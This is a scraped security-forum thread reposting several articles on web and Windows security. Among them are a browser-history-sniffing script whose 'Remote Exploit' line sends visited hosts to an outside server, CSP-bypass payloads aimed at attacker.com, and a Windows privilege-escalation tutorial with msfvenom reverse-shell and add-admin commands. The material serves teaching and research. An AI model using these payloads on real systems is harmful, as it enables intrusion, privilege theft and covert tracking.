'http://www.airbnb.co.kr/', 'http://www.airbnb.de/', 'http://www.airbnb.co.uk/', 'http://www.airbnb.com.au/', 'http://www.airbnb.ca/', 'http://www.airbnb.co.in/', 'http://www.airbnb.com.br/', 'http://www.airbnb.ru/', 'http://www.centrum24.pl/centrum24-web/login', 'http://coursera.org/', 'http://ellislab.com/', 'http://www.udacity.com/', 'http://bitcointalk.org/', 'http://uwaterloo.ca/', 'http://vc.ru/', 'http://tjournal.ru/', 'http://www.biblegateway.com/', 'http://www.themuse.com', 'http://att.yahoo.com/', 'http://www.yahoo.com/', 'http://ficbook.net/', 'http://www.ameriprise.com/', 'http://www.here.com/', 'http://www.rocketlawyer.com/', 'http://exmo.com/', 'http://skladchik.com/', 'http://healthunlocked.com/', 'http://www.upwork.com/', 'http://www.thegioididong.com/', 'http://fermasosedi.ru/', 'http://www.thegrommet.com/', 'http://www.freelancer.com/', 'http://www.freelancer.in/', 'http://klout.com/', 'http://www.veikkaus.fi/', 'http://www.lucidchart.com/', 'http://www.opensuse.org/', 'http://monitorbacklinks.com/', 'http://www.5giay.vn/', 'http://noncombatant.org/', 'http://nonfreesoftware.org/', 'http://hackpad.com/', 'http://meta.discourse.org/', 'http://devinegan.com/', 'http://ongardie.net/', 'http://titanous.com/', 'http://www.funkthat.com', 'http://nelhage.com/', 'http://yawnbox.com/', 'http://rednerd.com', 'http://smbmarketplace.cisco.com/', 'http://www.cloudflare.com/', 'http://letsencrypt.org/', 'http://helloworld.letsencrypt.org/', 'http://hoffman-andrews.com/', 'http://jdkasten.com/', 'http://jhalderm.com/', 'http://jve.linuxwall.info/' ]; /** * Gets hostname from URL. */ function getHost_(url) { return url.replace('http://', '').split(/\/|\?/)[0]; } /** * Our CSP policy (HTTP-only images) causes this to fire whenever the img src * redirects to HTTPS, either by HSTS (307) or plain old redirects (301/302). * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} start Time when the image load started * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host The host that fired the error * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function onImgError_(start, host) { var time = new Date().getTime() - start; if (host === BENCHMARK_HOST) { // This is just a calibration measurement so update the offset time. OFFSET = time; } else { // We need to subtract offset, otherwise hosts that are further down on the // page seem to have higher load times because of the time that it took for // the DOM to load. display(host, time - OFFSET, OFFSET); } } /** * Double-check whether hosts have been visited by trying synchronous image * loads, which have cleaner timing profiles. I find this helps reduce the * false positive rate in Chrome. AFAICT, the async image-load sniffing method * works great in Firefox so this isn't necessary there. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function(string, number)} callback Gets called when img error fires. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {function()} finished Called when all loads are done. * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function confirmVisited_(callback, finished) { var initial; // initial time var img = new Image(); var timeouts = []; // array of timeout IDs var hostsDone = []; var dummySrc = 'http://example.com/'; // URL for timer initialization function clearTimeouts_() { // Clear existing timeouts timeouts.forEach(function(id) { window.clearTimeout(id); }); timeouts = []; } function doNext_() { if (visited.length === 0) { finished(); return; } // Shift instead of pop since we are pushing hosts into the array while // this is running var host = visited.shift(); initial = new Date().getTime(); var src = 'http://' + host + '/?' + initial.toString(); img.src = src; // Abort after 20ms since positive results should take less time anyway timeouts.push(window.setTimeout(img.onerror.bind({ src: src}), TIMING_CONFIRM_THRESHOLD)); } img.onerror = function() { if (this.src !== dummySrc) { clearTimeouts_(); var host = getHost_(this.src); if (hostsDone.indexOf(host) !== -1) { // We might have called the callback for this host already. console.log('already done, skipping', host); } else { hostsDone.push(host); callback(host, new Date().getTime() - initial); } } else { console.log('initialized timer using', this.src); } doNext_(); }; img.onload = function() { // Should never happen but add a callback in case so it doesn't block the // rest of the image requests from being sent. console.log('UNEXPECTEDLY LOADED', this.src); doNext_(); }; // Set the image source initially to a dummy URL b/c the first load seems to // always take a long time no matter what. img.src = 'http://example.com/'; } /** * Times how long a request takes by loading it as an img src and waiting for * the error to fire. I would use XHR here but it turns out CORS errors fire * before CSP. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} host */ function timeRequest(host) { var img = new Image(); img.onerror = onImgError_.bind(this, new Date().getTime(), host); // Add random params so we don't hit the cache img.src = host + '?' + Math.random().toString().substring(2); } /** * Measures the calibration drift so we have a better estimate of how long * a resource fetch actually took. Since we expect the time T to fetch a * preloaded STS host to be ~constant, the fact that it changes indicates * that our timing is getting skewed by some amount, probably due to DOM * processing. Correct for the skew by subtracting T from measurements that * happen shortly after. */ function calibrateTime() { timeRequest(BENCHMARK_HOST); } /** * Display the results. * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {string} url * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} time * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {number} offset */ function display(url, time, offset) { var li = document.createElement('li'); var host = getHost_(url); li.id = host; li.appendChild(document.createTextNode(host)); if (time < TIMING_UPPER_THRESHOLD && time > TIMING_LOWER_THRESHOLD) { if (!isFirefox) { // If we are in Chrome, hide the results for now because the false // positive rate is really high until confirmVisited_() is called. li.style.color = 'lightgray'; } visitedElem.appendChild(li); visited.push(host); // +--== [ Remote Exploit by 1N3 @ CrowdShield - [URL]https://crowdshield.com[/URL] // Change url= to your own web server. var uri_visited = host; var uri = "http://xerosecurity.com/?redir=" + host; var port = 80; xhr = new XMLHttpRequest(); xhr.open("GET", uri + ":" + port, true); xhr.send(); } else { notVisitedElem.appendChild(li); } } if (!isFirefox) { // Chrome needs to do an extra timing confirmation step for results to be not // shitty. Wait 3 seconds for the async loads to mostly finish, then try one // synchrous load for each potentially-visited host. disclaimer.style.display = ''; window.setTimeout(function() { confirmVisited_(function(host, t) { if (!disclaimer.done_) { disclaimer.style.color = 'orange'; disclaimer.innerText = 'Removing false positives . . .'; disclaimer.done_ = true; } var elem = document.getElementById(host); if (!elem) { console.warn('No element found', host); return; } if (t <= TIMING_CONFIRM_THRESHOLD / 2) { console.log('showing', host, t); elem.style.color = ''; } else { console.log('hiding', host, t); elem.style.display = 'none'; notVisitedElem.appendChild(elem); } }, function() { disclaimer.style.color = 'green'; disclaimer.innerText = 'Done!'; saveCrypto_(!notVisitedElem.querySelector('#savecr ypto\\.org')); }); }, 3000); } else { window.setTimeout(function() { saveCrypto_(visitedElem.querySelector('#savecrypto \\.org')); }, 3000); } /** * Tell the user to sign this awesome petition if they haven't visited it! * Thank them if they have! * @<a href="https://rstforums.com/forum/members/param/" target="_blank">param</a> {Boolean} signed * @<a href="https://rstforums.com/forum/members/private/" target="_blank">private</a> */ function saveCrypto_(signed) { var text = signed ? 'PS: Thanks for signing <a href="https://savecrypto.org">savecrypto.org</a>! <3' : 'PS: Tell Obama to support strong encryption! Sign the petition at <a href="https://savecrypto.org">savecrypto.org</a>.'; disclaimer.style.display = ''; disclaimer.style.color = 'blue'; disclaimer.innerHTML = text; } // Main loop hosts.forEach(function(host) { calibrateTime(); timeRequest(host); }); Published by CrowdShield on 11/26/2015 Sursa: https://crowdshield.com/blog.php?name=remotely-sniffing-browser-history-via-xss-using-hsts-csp
  13. Nytro
    HITBGSEC 2015 - Dawid Czagan - Hacking Cookies in Modern Web Applications and Browsers PRESENTATION MATERIALS: Index of /materials/sg2015 PRESENTATION ABSTRACT: Since cookies store sensitive data (session ID, CSRF token, etc.) they are interesting from attacker’s point of view. As it turns out, quite many web applications (including sensitive ones like bitcoin platforms) have cookie related vulnerabilities that lead for example to user impersonation, remote cookie tampering, XSS and more. Developers tend to forget that multi-factor authentication will not help when cookies are insecurely processed. Security evaluators underestimate cookie related problems. Moreover, there are problems with secure processing of cookies in modern browsers and browser dependent exploitation can be used to launch more powerful attacks. That’s why secure cookie processing (from the perspective of web application and browser) is a subject worth discussing. The following topics will be presented: – cookie related vulnerabilities in web applications – insecure processing of secure flag in modern browsers – bypassing HttpOnly flag in Safari – problem with Domain attribute in Internet Explorer – cookie tampering in Safari – underestimated XSS via cookie – HTTP Strict Transport Security (HSTS) – importance of regeneration – and more ABOUT DAWID CZAGAN Dawid Czagan (@dawidczagan) has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter, BlackBerry and other companies. Due to the severity of many bugs, he received numerous awards for his findings. Dawid is founder and CEO at Silesia Security Lab, which delivers specialized security auditing and training services. He also works as Security Architect at Future Processing. Dawid shares his security bug hunting experience in his hands-on training “Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more”. He delivered security trainings/workshops at Hack In The Box (Amsterdam), CanSecWest (Vancouver), DeepSec (Vienna), Hack In Paris (Paris) and for many private companies. He also spoke at Security Seminar Series (University of Cambridge) and published over 20 security articles (InfoSec Institute).
  14. Nytro

    CSP 2015

    Nytro posted a topic in Securitate web

    (the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>) Since browsers can handle only 1 redirection, they have to pick up only 1 among the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one. Now think about it: does CSP really cover all the possible ways to fetch resources? Another no. HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features that defined by new specifications and whatnot. The most important thing is some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints. Finally We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using javascript: pseudo protocol as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload: javascript:"><link rel=prefetch href='//attacker.com/? ...Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality. You can find the original report from HackerOne. Takeaway A proper policy can significantly reduce the chance of XSS Beware of the nonce pitfall Content Exfiltration may be Achilles' Heel of CSP All in all, CSP does not replace input validation Sursa: http://blog.innerht.ml/csp-2015/
  15. Nytro
    November 23, 2015 Abusing CSS Selectors to Perform UI Redressing Attacks Jovon Itwaru Information Security Engineer Introduction Earlier this year, we received an interesting security advisory from Ruben van Vreeland of BitSensorregarding an issue discovered within our publishing platform. The technique Ruben described is unique and exemplifies the creativity needed to produce high-quality research. We analyzed his report and resolved the vulnerability. While we typically do not talk about bugs that we receive, the lesson learned and the uniqueness of this issue is worth sharing. In this blog post, we will describe Ruben’s novel attack that allows attackers to use existing CSS and style attributes to trick members into navigating to an attacker-controlled location, leading to potential social engineering and phishing attacks. Description As part of our publishing platform, we allow members to customize the look and feel and even share rich media content on their blog articles. This involves styling content with CSS, formatting with a subset of HTML elements, and also sharing audio/video resources. To mitigate certain classes of vulnerabilities such as XSS, a limited set of HTML tags (e.g. <img>, <a>, <p> and <br>) and safe attributes are allowed. Let’s dive into a simplified example that illustrates this technique. For instance, to create a blog entry, the following JSON request can be used to generate a new HTML page with an image tag and URL link. json{"content": "<p><a href=\"http://www.linkedin.com\">LinkedIn</a><img src=\"linkedin.png\"/></p>"} Resulting HTML page Rigorous input validation is performed on these elements to ensure attackers cannot introduce attribute or event handlers that would be used to construct XSS attacks. In some scenarios, it is possible to introduce benign attributes such as class that will not be flagged by the input validation filter. While this would not be a vulnerability by itself, Ruben realized that it can be used to reference existing CSS hosted on our site. Considering the extent of the platform, we have many CSS classes that are available on our CDNs and consumed by other products. For example, the following CSS styles are applied to the response page that renders blog entries: css<style> .li_style { position: absolute; width: 100%; z-index: 10021; position: fixed; top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden } </style> This type of style is a common way to force an element to stretch the entire height and width of a page. With knowledge of this available CSS style, we can resubmit the request and reference this style: json{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} The li_style covers the entire page. This, in turn, allows the page area to become clickable with a link to Example Domain. Impact and Recommendation As illustrated, an attacker can reuse trusted CSS class selectors to perform UI changes that are invisible to members. We believe that this attack is applicable to many sites, as many allow members to create and share rich media content. This is an interesting technique that uses existing resources to facilitate UI-redressing attacks by chaining together CSS class selectors, and has similarities to Return Oriented Programming (ROP). This technique can be used to send members to sites hosting malware or counterfeit sites that attempt to phish members by requesting their usernames and passwords. This is especially successful on social sites that share blogs or articles. As such, our recommendation is to only accept safe elements and attributes. For example, if theclass attribute is not allowed, reject any request that contains this. Additionally, whitelist filtering should be applied to CSS class selectors to permit necessary styles. We would like to thank Ruben for reporting this issue and help keeping our members safe. Thanks to his excellent work and communication with our team, Ruben was invited to join our private bug bounty program, hosted by HackerOne. This is one of many examples of the collaborations we experience with the talented researchers in our program. If you have a bug you would like considered, please submit to security@linkedin.com. Sursa: https://security.linkedin.com/blog-archive#11232015
  16. Nytro
    Acum, serios vorbind, pseudo-junalistii din ziua de azi sug pula.
  17. Nytro
    "ATENTIE de transmis URGENT Dac? ave?i un apel telefonic ?i pe mobil se afi?eaz? „A C E” nu r?spunde?i; anula?i apelul. Este un virus care distruge cartela SIM ?i distruge mobilul. Aceasta a fost confirmata de Motorola, Sagem si Nokia." WTF is this shit? De la comentarii: https://sternocleidomastoidian.wordpress.com/2010/04/14/informare-a-ministerului-de-interne/
  18. Nytro
    E pe bune, am luat eu root pe laser.
  19. Nytro
    Parameter choice for PBKDF2 PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use. The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are unfeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a “salt” parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys). A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key. The specification suggests (in section 4.1) that the salt be (or contain) a 64 bit pseudorandom value. This makes collisions (i.e. occasions that two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion. The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to attack use hardware-based password crackers based on GPUs or ASICs. The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then. Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10 000 iterations.NIST’s own guide (Appendix A.2.2) recommends that the iteration count be “as high as can be tolerated while still allowing acceptable server performance”. Cracking Stuff What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password? First we have to estimate how much entropy or “randomness” there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the “Comprehensive8” policy, “Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word.”, the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list. Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it’s now November 2015, so suppose conservatively we can apply Moore’s law almost once since then (whether one can apply Moore’s “law” to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware. The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password. [TABLE] [TR] [TH]Password complexity[/TH] [TH]Entropy estimate (bits)[/TH] [TH]1000 iterations[/TH] [TH]10000 iterations[/TH] [/TR] [TR] [TD]Comprehensive8[/TD] [TD]33[/TD] [TD]4 hours 46 minutes[/TD] [TD]47 hours[/TD] [/TR] [TR] [TD]8 random lowercase letters[/TD] [TD]37[/TD] [TD]12 hours[/TD] [TD]5 days[/TD] [/TR] [TR] [TD]8 random letters[/TD] [TD]45[/TD] [TD]123 days[/TD] [TD]3 years 5 months[/TD] [/TR] [TR] [TD]8 letters + numbers + punctuation OR 4 random Diceware words[/TD] [TD]52[/TD] [TD]325 years[/TD] [TD]3250 years[/TD] [/TR] [/TABLE] Conclusions If you have to use PBKDF2, you should: use a unique 64-bit salt for each password. rather than SHA-1, use SHA-512 or if not SHA-256 if you can. use an iteration count of at least 10000, more if you can do it “while still allowing acceptable server performance”. In a future blog post, we’ll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, ARGON-2. Sursa: https://cryptosense.com/parameter-choice-for-pbkdf2/
  20. Nytro
    Samsung S6 calls open to man-in-the-middle base station snooping Research duo pop baseband chip in preliminary demo-hack 12 Nov 2015 at 05:56, Darren Pauli PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers. Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Toyko. Full exploitation details of their research has not been publicly detailed, but it has been disclosed to Samsung. Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient. Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work. "Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call. "So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant." Nico Golde (l) and Daniel Komaromy at Pwn2Own today. ?????? Drago Ruiu The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over. "I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs." The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference. It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site. Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out. ® Sursa: Samsung S6 calls open to man-in-the-middle base station snooping • The Register
  21. Nytro
    [h=1]Senior IT Auditor[/h] What are we looking for? Senior IT Auditor for our Advisory team. Candidate profile: • Conduct IT Audits in accordance with IT audit methodology and other relevant standards; • Strong ability to articulate business risks of deficiencies identified to client personnel; • Identify and communicate findings to client personnel; • Recognize performance improvement opportunities for clients. Requirements: • Bachelor’s degree in an IT related field • Minimum 2 years of experience in IT audits • Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases) • Ability to test the IT controls (entity level, IT general controls, application level) and to identify compensating controls • Basic knowledge of various IT environments • Very good technical and business English • Ability to identify and resolve IT related business issues and provide innovative solutions both for IT and business • Work effectively either individually or as a member of a multi-skilled team • Professional discipline, accuracy, reliability and excellent analytical skills • Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation • Certifications such as CISA, CISSP, CRISC or ISO27001 will be considered a plus Our Offer: • A competitive salary and benefits package • The chance to develop a rewarding professional path and work on challenging assignments • Support for professional qualifications and personal development through a strong mentoring program • Work in a friendly team of security professionals who enjoy sharing their experience with colleagues • The opportunity to participate in a wide variety of technical projects and client environments • Flexible working program We are looking forward to receiving your CV and letter of motivation, in English, until December, 15th 2015. Shortlisted candidates will be invited to interview. Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2 Note: 1. Job-ul nu este legat de security 2. Este adresat persoanelor care au mai facut asa ceva Info (cred): https://en.wikipedia.org/wiki/Information_technology_audit Daca aveti nevoie de mai multe informatii imi puteti da PM. Daca vreti sa fie vazut rapid si de catre cine trebuie CV-ul imi puteti da PM.
  22. Nytro
    [h=1]Black Hat USA 2015 - Red Vs Blue Modern Active Directory Attacks, Detection, And Protection[/h]
  23. Nytro
    O sponsoizare de la Starbucks, Gloria Jeans sau mai stiu eu ce, ar prinde bine. L-ar aduce pana si pe @aelius acolo, chiar de ar fi in Germania.
  24. Nytro
    OpenVPN for paranoids Tue 17 November 2015 By Victor Dorneanu Continuing my admin series this time I'd like to setup a VPN using OpenVPN as user-based VPN solution. Unlike IPSec solutions which require IPSec on both (server and client) sides, securing the VPN tunnel by OpenSSL is a more preferable option.In this post I'll try to show which steps have to be taken in order to: secure the communication channel use up-to-date (and secure!) TLS configurations prevent information leaks when the VPN tunnel is down At least for the last one some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connection only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist, is covered later on. Articol complet: OpenVPN for paranoids - blog.dornea.nu
  25. Nytro
    Posted on November 24, 2015 by Jonathan Common Windows Privilege Escalation Vectors Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances. Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.) Trusted Service Paths This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path: C:\Program Files\Some Folder\Service.exe For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exeNote: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. As a result, you may see this vulnerability referred to as “Unquoted Service Paths.” If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability… To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware icacls "C:\Program Files (x86)\Privacyware" Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin! Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder. For a more information on Windows permissions, check out the following MSDN link: File and Folder Permissions. When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible! msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool: sc stop PFNet sc start PFNet LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point! Metasploit Module: exploit/windows/local/trusted_service_path This module only requires that you link it to an existing Meterpreter session before running: A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable. Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me… Vulnerable Services When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting: Service Binaries Windows Services The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VIOLA! The latter refers to the actual Windows Service and the ability to modify it’s properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look… The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications. While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim. Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level): accesschk.exe -uwcqv "Authenticated Users" * /accepteula Well, what do we have here? PFNet shows it’s face once more! SERVICE_ALL_ACCESSmeans we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and often times these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*). Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through. Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service: sc qc PFNet Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validatingSERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group: sc config PFNET binpath= "net user rottenadmin P@ssword123! /add" sc stop PFNET sc start PFNET sc config PFNET binpath= "net localgroup Administrators rottenadmin /add" sc stop PFNET sc start PFNET YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only afterissuing our malicious commands: Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention. Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?). Metasploit Module: exploit/windows/local/service_permissions This module only requires that you link it to an existing Meterpreter session before running: This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt. AlwaysInstallElevated AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because For this to occur, there are two registry entries that have to be set to the value of “1” on the machine: [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist. Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msiOnce you have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation: msiexec /quiet /qn 